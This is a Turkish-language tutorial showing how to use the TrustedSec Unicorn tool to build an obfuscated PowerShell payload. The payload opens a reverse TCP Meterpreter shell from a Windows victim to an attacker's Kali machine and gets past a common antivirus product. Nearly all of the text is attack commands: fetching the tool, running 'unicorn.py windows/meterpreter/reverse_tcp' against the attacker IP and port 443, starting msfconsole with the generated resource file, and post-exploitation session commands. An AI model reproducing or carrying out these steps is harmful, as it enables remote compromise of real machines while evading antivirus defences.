Unicorn aracı, kurban sisteme payload hazırlanması için kullanılabilir. Bu araç kullanılarak, saldırgan tarafından payload hazırlacak ve kurban bilgisayarında çalıştırılan bir Powershell komutu ile bu payload çalıştırılacaktır. Kurban işletim sisteminde kurumlarda ve son kullanıcı bilgisayarlarında en çok kullanılan anti-virüslerden biri yüklü olmasına rağmen Meterpreter bağlantısının elde edilebildiği görülecektir.
Unicorn betiği Github sayfasından indirilir.
https://github.com/trustedsec/unicorn
İndirilen şıkıştırılmış dosya açılır.
ls
unzip unicorn-master.zip
ls
cd unicorn-master
ls -la
Betik çalıştırılacak şekilde ayarlanır ve manuel’i okunur.
chmod 744 unicorn.py
./unicorn.py –help
Payload ayarlanır. 443. TCP portundan Kali bilgisayarına (192.168.74.141) ters TCP Meterpreter bağlantısı elde edebilen Powershell saldırısına ait örnek komut aşağıdaki gibidir.
python unicorn.py windows/meterpreter/reverse_tcp 192.168.74.141 443
Komut çalışması tamamlandıktan sonra, “powershell_attack.txt” ve “unicorn.rc” dosyaları oluşmuştur.
ls
Oluşan 2 dosyanın içeriği aşağıdaki gibidir. “unicorn.rc” dosyası ise Meterpreter Multi/handler modülünü otomatik olarak başlatacak olan kaynak dosyadır (Resource File). “powershell_attack.txt” dosyasında ise, Powershell ile çalıştırılacak olan payload bulunur.
cat unicorn.rc
cat powershell_attack.txt
“unicorn.rc” kaynak dosyası kullanılarak Listener başlatılır ve payload’un görevini yaparak ters bir bağlantı talep etmesi beklenir.
msfconsole -r “unicorn.rc” -q
Windows istemci bilgisayarı üzerinde ise “powershell_attack.txt” dosya içeriğindeki payload çalıştırılır.
Böylece Kali tarafında talep yakalanmaktadır ve Meterpreter bağlantısının elde edildiği görülmektedir.
sessions
sessions -i 1
sysinfo
Powershell komutunu çalıştıran kullanıcı hakları ile 32 bitlik Powershell prosesi ile bağlantı oluşmuştur.
ps -U Yonetici
getpid
Kaynak:
https://www.trustedsec.com/july-2015/magic-unicorn-v2-0-released/